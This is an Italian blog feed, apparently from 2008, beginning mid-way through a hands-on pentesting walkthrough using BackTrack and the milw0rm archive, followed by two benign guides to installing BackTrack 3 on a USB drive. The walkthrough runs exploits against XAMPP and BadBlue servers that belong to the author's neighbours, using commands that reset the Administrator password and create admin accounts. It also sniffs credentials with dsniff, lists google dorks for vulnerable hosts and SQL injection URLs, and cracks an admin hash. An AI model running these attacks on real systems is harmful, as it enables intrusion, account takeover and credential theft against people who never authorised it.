bt~# grep Vista sploitlist-bt.txt

e ci verranno restituite le subdirectory con gli exploits disponibili.

Per fare un semplice esempio , nel nostro caso , trattandosi per quanto riguarda il pentesting contro il sistema con Windows XP.professional , del webserver BadBlue andrò dapprima nella directory corretta e poi cercherò con il comando grep gli exploits disponibili , nel modo seguente:

bt ~# cd /pentest/exploits/milw0rm/

bt milw0rm # grep BadBlue sploitlist-bt.txt

..ed ecco il risultato ottenuto.

***

./platforms/windows/remote/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./platforms/windows/remote/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./platforms/windows/remote/4715.txt BadBlue <= 2.72b Multiple Remote Vulnerabilities
./platforms/windows/remote/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
./rport/80/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./rport/80/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./rport/80/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit

***

[Attacco con Exploits]

Arrivati ai vari tipi di attacco facciamone , come è giusto , una brevissima descrizione fatta secondo le principali sigle su milw0rm , ovvero: DoS-PoC , Web-App , Shellcode , Local e Remote

[Attacco DoS e DDoS]:

La sigla DoS sta a significare Denial of Service , e la sigla DDos sta invece per Distribuite-Denial of Service.

Come dicono le stesse sigle , il successo di questo tipo di attacco sta nel diniego del servizio , distribuito nel secondo caso , (DDoS) , singolo nel primo.

Queste parole in stile “traduzione” , dovrebbero rendere già l’idea del significato di un attacco DoS oppure DDoS , il suo funzionamento sta nel far arrivare al sistema vittima un attacco , o un insieme di attacchi , che rendono inaccessibile il sistema ; ma come può avvenire ciò?

La risposta è facile: un sito , che si raggiunge con una connessione ad internet , può esserci negato quando ad esempio siamo senza banda , senza linea praticamente , e saturare la banda a disposizione del sistema potrebbe essere quindi già un metodo per effetuare un DoS. Un attacco alla banda di un sistema potrebbe avvenire ad esempio tramite un eccessivo numero di richieste di accesso , ed il sistema , se non preparato , non potrà che andare fuori uso.

È ancora oggi famoso ciò che accadde nel Febraio del 2000 , quando al sistema di Yahoo! venne sferrato un attacco di tipo DDoS , e rimase inaccessibile per delle ore. L’ attacco sferrato partì da centinaia di host in giro per la rete che a sua volta furono violati precedentemente.(…Tahnx! to OpenSkills)

Il sistema di attacco DoS non è compromettente , è facile capire che se viene effettuato un DoS tramite la saturazione di una banda , una volta che la stessa tornerà attiva i problemi svaniranno…. ….almeno fino al prossimo attacco (!?), ma non è comunque una cosa che compromette il sistema.

[La sigla PoC]:

La sigla PoC sta a significare “Proof of concept” , abbozzo o progetto da terminare , inserita con lo scopo di dimostrare la fondatezza di un determinato progetto. Negli elenchi degli exploits sul sito milw0rm.com , la sigla PoC viene riportata quando coloro che scoprono il bug e ne scrivono successivamente l’ exploit corrispondente , mostrano con delle spiegazioni l’ eseguibilità del loro lavoro.

breve esempio:

nell’ ultima demo del videotutorial si esegue un attacco verso uno Xampp , l’ exploit come già detto scritto da rGod , contiene commentata una serie di stringhe che ne spiegano l’ efficacia , questo il contenuto del PoC nell’ exploit ./3738.php di rGod…

***

mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .

If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:

intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows

note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have  magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/

***

[Attacco in local] :

L’ attacco in local è quell’ attacco che si svolge all’ interno di una rete indipendende , anche se non del tutto , o si ha già comunque un certo accesso alla rete stessa. Un esempio può essere quello di fare dello sniffing nella propria LAN oppure acquisire i privilegi di amministratore del sistema da utente semplice. Un esempio di sniffing può essere quello che ho descritto nell’ esempio fatto con Ettercap e che dimostra appunto come poter fare “sniffing” di username e password all’ interno di una LAN.

Gli attacchi in local sono però di varia natura , anche se la maggiorparte , vista la questione di permessi , sono effettuati su sistemi M$Windows , ce ne sono anche molti per sistemi UNIX-based , l’ exploit n° 5052 ,(quando parlo di numeri , mi rivolgo al numero occupato dall’ exploit all’ interno dell’ archivio milw0rm), infatti è proprio propenso al local root exploitation su sistemi GNU/Linux.

[Attacco in remoto]:

L’attacco in remoto è quella tipologia di attacco che si effettua da una postazione totalmente estranea all’ obbiettivo , che si trova quindi su di un altro dominio , e di cui non si ha nessun permesso d’ accesso.

È logico capire che ogni tipo di attacco può o no essere fine a se stesso , oppure può essere utilizzato in concomitanza con altre tipologie di attacco.

***

In questo caso ho elencato esclusivamente alcuni tipi di attacco , solo per rendere l’ idea , se si và sul sito milw0rm.com si possono trovare sigle del tipo RFI , LFI , Loca Root Exploits eccetera… , a tutte queste descrizioni sia giusto rimandarvi al portale informatico di Wikipedia.

***

Andiamo avanti con il tutorial , il primo pentesting , (terza demo nel video) ,  viene eseguito sullo Xampp , dalla directory esatta , come sopra eseguo da shell il comando:

bt milw0rm # grep XAMPP sploitlist-bt.txt

ed eccone il risultato:

./platforms/windows/remote/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

./platforms/windows/local/4325.php XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
./rport/80/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

***

L’ exploit che useremo è il 3738.php , e per essere eseguito basta dare un occhiata alla matrice stessa dell’ explot , basta dare da shell il comando come eseguibile preceduto dall’ interprete quindi:

php ./3738.php

il tutto naturalmente dopo essere entrati nelle directory elencate dal comando grep.

bt milw0rm # cd platforms/windows/remote/

Con il comando appena eseguito ci verrà elencata tutta la “matrice” dell’ exploit , chi l’ ha scritto , la piattaforma , il bug e in che modo deve essere eseguito , e infatti ecco il risultato…

***

bt remote # php ./3738.php

—————————————————————————
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
—————————————————————————

—————————————————————————
Usage: php ./3738.php host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-S only send the second packet
Example:
php ./3738.php localhost VER -P1.1.1.1:80
php ./3738.php localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
Administrators /ADD sun -p81 -S
—————————————————————————

***

Come possiamo vedere dalla lista di informazioni che ci viene restituita all’ interno della nostra shell , l’ exploit per essere eseguito necessita di alcune informazioni. Ogni exploit per essere eseguito necessita di informazioni diverse , ci sono exploit compilati e da compilare , e tutti sono eseguibili con successo , naturalmente , solo se il sistema vittima è affetto dalla vulnerabilità che l’ exploit andrà ad usare lo Xampp deve essere alla versione <=1.6.0a , rigorosamente , come possiamo leggere dalla matrice stessa , per Windows.

Vediamo ora di eseguire l’ exploit con i dovuti comandi…

Un esempio che ci viene mostrato dall’ exploit è il seguente:

php ./3738.php localhost VER -P1.1.1.1:80

Noi , avendo un server su cui provarlo , daremo il seguente comando da konsole:

php ./3738.php 29.230.6.73 net user Administrator komintern

dove:. net user Administrator komintern è il comando che verrà eseguito sul server dopo il BoF , ovvero il cambio della password dalla precedente a komintern sul sistema del mio vicino di casa con il quale mi trovo nella stessa Lan…comando che per funzionare , questo va detto , mi ha costretto a modificare varie opzioni nel database e vari files di configurazione del PHP , php.ini eccetera.

Una volta cambiata la password dell’ Administrator , apro una sessione Telnet e mi connetto al Server con le credenziali create , per mostrarle ho fatto un semplicissimo sniffing con dsniff sulla mia stessa interfaccia di rete , con il comando:

bt remote # dsniff -i ath0

che naturalmente ha funzionato alla perfezione mostrandomi le credenziali di accesso al server ovvero:

—————–
06/30/08 21:32:12 tcp 29.230.6.74.42449 -> 29.230.6.73.23 (telnet)
KominternAdministrator
komintern

Aperta la sessione Telnet sono stato in grado di inetragire con tutto il sistema , la maggiorparte delle volte infatti se il servizio Telnet è abilitato , solo l’ Administrator può interagire con il Desktop del sistema , non si lascia interagire un utente “normale” o anche del gruppo Administrators… …ma questo di solito , poi ognuno configura la propria rete come vuole.

Il giallo sta a rappresentare un semplice errore di sniffing di dsniff , perchè volendo copiare la parola komintern senza doverla digitare in seguito , e come potete vedere dal video lo username è stato unicamente Administrator , provando a dare meglio l’ idea dsniff ha raccolto le credenziali in modo totale , senza che poi il login abbia o no avuto successo.

È ovvio che ho preso il caso dello xampp perché volevo realizzarci un video e fare una piccola dimostrazione , ma se ci saremmo dovuti occupare di fare pentesting su di un server esterno le cose non sarebbero cambiate di molto , ad ogni versione di MySQL , di PHP di CMS eccetera , corrispondono delle vulnerabilità e degli exploits , e con l’ archivio di Milw0rm nella nostra BackTrack , abbiamo la possibilità di effettuare tutti i test che vogliamo. La maggiorparte delle volte che si sente parlare di siti che pubblicano exploits in “malomodo” , succede per il semplice fatto che chi fa danni , al 99% dei casi non va a scegliersi un obbiettivo da attaccare , che sarebbe a mio modo di vedere la cosa , sempre male ma che dimostra capacità , ma lo fà andando in giro per dork , ovvero trovare in google tutti i siti vulnerabili per poi prendere il primo che capita e fare il danno… …cosa che , a quanto pare , rende più famosi , ma molto semplice ed inutile.

***

Andiamo adesso ad effettuare il nostro pentesting contro un sistema che ha come OS WindowsXpPro , nel video la prima demo.

facciamo una scansione delle porte tramite nMap , e vediamone il risultato…

***

bt ~ # nmap -sS -sV -T Aggressive 29.230.6.73 -v

Starting Nmap 4.50 ( http://insecure.org ) at 2008-05-16 11:18 GMT
Initiating ARP Ping Scan at 11:18
Scanning 29.230.6.73 [1 port]
Completed ARP Ping Scan at 11:18, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:18
Completed Parallel DNS resolution of 1 host. at 11:18, 0.05s elapsed
Initiating SYN Stealth Scan at 11:18
Scanning 29.230.6.73 [1711 ports]
Discovered open port 81/tcp on 29.230.6.73
Discovered open port 139/tcp on 29.230.6.73
Discovered open port 912/tcp on 29.230.6.73
Discovered open port 445/tcp on 29.230.6.73
Discovered open port 135/tcp on 29.230.6.73
Discovered open port 4662/tcp on 29.230.6.73
Completed SYN Stealth Scan at 11:19, 7.24s elapsed (1711 total ports)
Initiating Service scan at 11:19
Scanning 6 services on 29.230.6.73
Completed Service scan at 11:19, 11.07s elapsed (6 services on 1 host)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 11:19
Completed SCRIPT ENGINE at 11:19, 0.21s elapsed
Host 29.230.6.73 appears to be up … good.
Interesting ports on 29.230.6.73:
Not shown: 1705 filtered ports
PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
912/tcp open ftp vsftpd or WU-FTPD
4662/tcp open edonkey?
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)
Service Info: OS: Windows

Host script results:
|_ Discover OS Version over NetBIOS and SMB: Windows XP

Read data files from: /usr/local/share/nmap
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.845 seconds
Raw packets sent: 3417 (150.346KB) | Rcvd: 7 (318B)

***

bene , come possiamo vedere sul sistema “vittima” ci sono , oltre a delle porte aperte che potrebbero essere sfruttate in altro modo , delle informazioni che possono esserci molto preziose , infatti dalle ultime righe possiamo benissimo leggere:

***

PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7

***

Sulla porta 80 quindi c’é in esecuzione il BadBlue , alla versione 2.7.

Il BadBlue è un webserver che permette di poter condividere , pubblicamente o no , tutti i files , documenti , foto eccetera.

Il BadBlue a questa versione , che nMap ci ha restituito , contiene però una vulnerabilità che è molto grave come falla e ci permette di penetrare il sistema e dopo aver causato un BufferOverFlow ci permette anche di ottenere una reverse shell , i comandi , shellcode compreso , sono già tutti contenuti all’ interno dell’ exploit.

potete vedere benissimo dal video che non solo sono penetrato , grazie all’ exploit , all’ interno del sistema , ma ho anche cambiato la password dell’ amministratore del sistema stesso con il seguente comando:

net user KaB0T brigante

C:\> net user KaB0T brigante

(KaB0T è il nome di un mio vicino di casa con il quale mi condivido spesso la connessione…)

Il terzo ed ultimo esempio di pentesting , nel video seconda demo , con exploits targati milw0rm l’ ho fatto con una semplicissima SQL-Injection… …semplicissima per chi la usa , come nel nostro caso , ma per realizzare l’ exploit non è così semplice.

La SQL-Injection che ho usato per questo test va a colpire una vulnerabilità insita nel CMS-Family Connection , alla versione 1.4.

sempre con la stessa procedura , mi sono spostato nella directory giusta…

bt ~ # cd /pentest/exploits/milw0rm/

ed ho raccolto i possibili risultati dall’ archivio con il comando grep:

bt milw0rm # grep Family sploitlist-bt.txt

e questo è stato il risultato:

./platforms/php/remote/892.txt phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
./platforms/php/remote/1208.pl phpMyFamily <= 1.4.0 SQL Injection Exploit
./platforms/php/remote/5811.txt Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerability

***

Ottenuto il risultato per il FamilyConnection-CMS cui mi trovavo davanti , sono andato nella directory giusta:

bt milw0rm # cd platforms/php/remote/

dopodiché essendo un file *.txt potevo aprirlo come volevo , con nano , vim , kate , visto che non finisce in shell come i precedenti due esempi l’ ho aperto con lo Scintilla… …lo SciTE , editor adattabile a molti linguaggi di progrmmaione compreso in BackTrack di prima installazione , quindi:

bt remote # SciTE 5811.txt

aperto il file *.txt ho letto le seguenti indicazioni:

***

First you must register for access to user section then SQL Injection Exploit !!!

———-
Exploits
———-
[+] /addressbook.php?address=<SQL Injection>
[+] /familynews.php?getnews=<SQL Injection>&newsid=2
[+] /home.php?action=results&poll_id=<SQL Injection>

***

dopodiché ho eseguito l’ Injection ed ho ottenuto le credenziali di accesso dell’ amministratore del sito , ovvero:

***

admin : 6970ff8bb08f3c1bde2f49c608ac4b21

***

Una volta preso l hash dell’ admin , vado direttamente sul sito di milw0rm.com sul link cracker e inserisco l hash selezionando naturalmente come opzione di criptatura md5 , aspetto non molto , visto che già l’ avevo fatta prima l’ operazione e ottengo la password con la quale in seguito effettuo l’ accesso al CMS come amministratore.

Naturalmente avrei potuto fare anche una prova con John The Ripper o altre soluzioni OFF-Line inserite in BackTrack , ma parlando dell’ archivio degli exploits di milw0rm.com ho ritenuto migliore soluzione lavorare con lo stesso cracker di milw0rm , oltretutto in questo modo si contribuisce ad aggiungere un altro hash crackato , sperando sempre che non finisca nelle mani sbagliate.

Questa è solo una semplicissima dimostrazione di come è possibile fare pentesting con estrema facilità e nel minor tempo possibile , del resto da un’ accoppiata come Milw0rm & BackTrack ci si può aspettare solo il top.

Spero di essere stato abbastanza chiaro , per ogni cosa nella pagina /video c’é il videotutorial di questo How-To… per ogni chiarimento siamo in canale e in mailinglist.

I commenti quì nel blog cortesemente , usateli come comnmenti , non come help-desk.

Ciao a tutti e alla prossima.

Questa è un’altra guida molto semplice che spiega come installare da linux la nostra copia di BackTrack-3.final su una pen drive USB.

Ciò di cui abbiamo bisogno è questo:

-Una distribuzione linux per l’installazione
-La .iso della BackTrack 3 scaricabile dal wiki di Remote-Exploit linkato sul lato destro del nostro blog
-Una pen drive di almeno 1 GB (2 GB raccomandati)

Iniziamo:

1- Scarichiamo la nostra copia di Backtrack sul nostro pc (la release per usb naturalmente).

2- Ora creiamo un punto di mount nella nostra cartella /mnt che ci servirà per fare il mount della nostra .iso:

%mkdir /mnt/iso

***

3- Dopo esserci posizionati nella destinazione in cui abbiamo scaricato la nostra Backtrack possiamo fare il mount della iso nella cartella che abbiamo appena creato:

%mount -o loop -t iso9660 bt3final_usb.iso /mnt/iso

***

4- Facciamo il mount alla pen drive:

%mount /dev/sda1 /mnt/pendrive

***

sda1 corrisponde alla mia pen drive non è detto che a voi sia rilevata nel mio stesso modo; /mnt/pendrive è il punto di mount che ho impostato , se a voi è diverso dovete scrivere il vostro

***

4- Fatto questo sarà necessario copiare le 2 cartelle che avete creato quindi boot e bt3 situate in /mnt/iso nella nostra pen drive

***

5- Ora non ci resta da far altro che rendere bootable la nostra penna usb e lo faremo così:
%cd /mnt/pendrive/boot

%bootinst.sh

***

***

6- Diamo conferma con INVIO e facendo il reboot dovrebbe partire BackTrack (naturalmente dovete aver precedentemente impostato il vostro Bios per boot da Usb)

Ciao a tutti e alla prossima

[edit]

scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida BackTrack tutto dalla 2.final alla 3.beta , nella sezione /install.

Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in questo post sul forums.remote-exploit.org.

[/edit]

Questa piccola guida riprende una guida reperibile su internet che tratta dell’installazione su pen drive di una distribuzione knoppix , è stata dunque riadattata per la Backtrack e l’abbiamo preferita alle altre perché è davvero semplicissima.

Questo è ciò di cui avete bisogno per avere la vostra Backtrack su usb:

- pen drive di almeno 1 GB.

- un pc con sistema operativo windows installato (xp o vista).

- la *.iso (versione apposita per usb) di Backtrack 3 reperibile dal WiKi (wallaper di BackTrack 3 a destra della colonna centrale del blog)

- file fixkp2.exe .

Ora seguite questi passaggi:

1-Scaricate il file eseguibile fixkp2.exe da questo indirizzo: http://www.pendrivelinux.com/downloads/fixkp2.exe ed eseguitelo, verrà creata automaticamente una cartella denominata USB-Knoppix nella destinazione che imposterete a vostro piacimento.

2-Scaricate la *.iso di Backtrack e spostatela nella cartella precedentemente creata cioè USB-Knoppix.

3-Cliccate il file fixkp2.bat presente nella cartella USB-Knoppix e seguite le istruzioni che vi vengono date. {Dovete inizialmente inserire la lettera corrispondente alla vostra pen drive , (già inserita precedentemente), poi vi verrà chiesto se siete disposti a formattarla(dovete confermare con ‘y‘), l’estrazione e la copia dei files sulla penna avverrà automaticamente, infine vi verrà chiesto se volete rendere bootable la vostra pen drive e voi naturalmente dovete confermare’y‘}.

***

***

***

***

4- Riavviate il vostro pc e impostate il vostro BIOS affinché faccia il boot da usb , salvate i cambiamenti e riavviate nuovamente.

5- Eseguito il reboot (con pen drive inserita), dovrebbe partire la vostra copia di Backtrack dalla memoria usb.

Questi sono 2 screenshoot della versione USB di Backtrack 3.final . Potete notare la grafica accattivante di Compiz Fusion già pronto all’uso

***

***

***

Ciao a tutti e alla prossima.

[edit]

scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida BackTrack tutto dalla 2.final alla 3.beta , nella sezione /install.

Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in questo post sul forums.remote-exploit.org.

[/edit]

]]> http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-windows/feed/ 34 redbar0n